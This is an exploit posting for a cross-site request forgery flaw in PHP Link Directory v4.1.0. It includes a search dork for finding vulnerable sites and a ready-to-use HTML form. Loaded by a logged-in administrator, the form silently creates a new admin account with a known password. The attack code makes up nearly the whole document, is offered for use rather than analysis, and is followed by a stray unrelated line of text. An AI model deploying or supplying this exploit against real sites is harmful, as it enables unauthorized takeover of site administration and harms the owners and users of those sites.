PHP Link Directory v4.1.0 CSRF Vulnerability (Add Admin) ==================================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST[F.Hack@w.cn] .:. Script : http://www.phplinkdirectory.com/ .:. Dork : "Powered by: PHP Link Directory" .:. Gr34T$ T0 [h1ch4m] & [Risky] & [www.Hack-Book.com] #################################################################### ===[ Exploit ]=== <html> <head> <title>PHP Link Directory v4.1.0 [Add Admin]</title> </head> <H2>CSRF Add Admin By AtT4CKxT3rR0r1ST</H2> <form method="POST" name="form0" action="http://localhost/admin/conf_users_edit.php?action=N"> <input type="hidden" name="LOGIN" value="webmaster"/> <input type="hidden" name="NAME" value="Mohammad Hussien"/> <input type="hidden" name="PASSWORD" value="123456"/> <input type="hidden" name="PASSWORDC" value="123456"/> <input type="hidden" name="LANGUAGE" value="sq"/> <input type="hidden" name="EMAIL" value="example@hotmail.com"/> <input type="hidden" name="cemail" value="1"/> <input type="hidden" name="LEVEL" value="1"/> <input type="hidden" name="formSubmitted" value="1"/> <input type="hidden" name="id" value=""/> <input type="hidden" name="exclude_id" value=""/> </form> </body> </html> ####################################################################
体验盒子
